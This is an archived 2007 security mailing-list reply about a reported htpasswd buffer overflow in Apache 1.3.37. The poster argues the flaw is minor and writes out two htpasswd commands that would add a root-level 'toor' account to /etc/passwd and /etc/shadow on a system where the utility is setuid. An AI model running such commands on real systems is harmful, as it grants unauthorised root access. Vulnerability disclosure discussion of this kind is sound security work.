| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-Id: <CEB486F6-FFAE-46A8-9530-15E483C5C3A0@gmail.com> Date: Tue, 2 Jan 2007 15:45:45 -0800 From: Andrew Farmer <andfarm@...il.com> To: "Matias Soler" <gnuler@...il.com> Cc: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com Subject: Re: Apache 1.3.37 htpasswd buffer overflow vulnerability On 02 Jan 07, at 12:20, Matias Soler wrote: > Synopsis: Apache 1.3.37 htpasswd buffer overflow vulnerability > Version: 1.3.37 (latest 1.3.xx) > > Product > ======= > Apache htpasswd utility > > Issue > ===== > A buffer overflow vilnerability has been found, it is dangerous > only on > environment where the binary is suid root. If htpasswd is setuid, then one could just as easily: htpasswd -bp /etc/passwd toor x:0:0:toor::/:/bin/sh htpasswd -bp /etc/shadow toor xxa8fjDF6WqBA:0:0:99999:7::: and get root. (Or any number of things - sudoers, crontab, SSH keys - take your pick.) It's possible that this buffer overflow may be significant in very limited circumstances - if the utility is executed from a web application, perhaps. However, this seems like a rather limited-scope issue. -- Andrew Farmer _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists